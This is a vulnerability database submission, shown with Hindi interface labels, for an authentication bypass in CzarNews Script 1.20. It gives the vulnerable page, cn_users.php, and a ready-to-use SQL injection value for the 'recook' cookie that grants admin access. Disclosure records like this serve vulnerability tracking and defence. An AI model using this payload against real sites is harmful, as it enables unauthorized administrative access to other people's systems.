| शीर्षक | CzarNews Script – Authentication Bypass |
|---|
| विवरण | Introduction
Exploit Title: CzarNews Script – Authentication Bypass
Version: 1.20
Date: 28.01.2017
Vendor Homepage: http://www.czaries.net
Software Download: http://www.czaries.net/scripts/czarnews.php
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
CzarNwes is a news script that provides powerful news manager on your website. It uses the fastest MySql database system that allows quick changes with posting and comment. Users are allowed unlimitedly under some conditoins to access your own database. News can be posted easily and quickly and it supports HTML and other formatting styles. A highly effective admin panel allows you to do everything on your website. Password retrieval system helps you when the password is forgotten. Installation takes less than a minute and it requires php 4.x and MySql database.
Vulnerable Url:
http://locahost/czarnews/cn_users.php
Set new cookie:
Name : recook
Value : admin%2C'or''='
and refresh the page. |
|---|
| उपयोगकर्ता | KAAN KAMIS (UID 213) |
|---|
| सबमिशन | 29/01/2017 03:50 PM (9 साल पहले) |
|---|
| संयम | 30/01/2017 03:49 PM (24 hours later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 96259 [CzarNews Script 1.20 Cookie /czarnews/cn_users.php recook SQL इंजेक्शन] |
|---|
| अंक | 17 |
|---|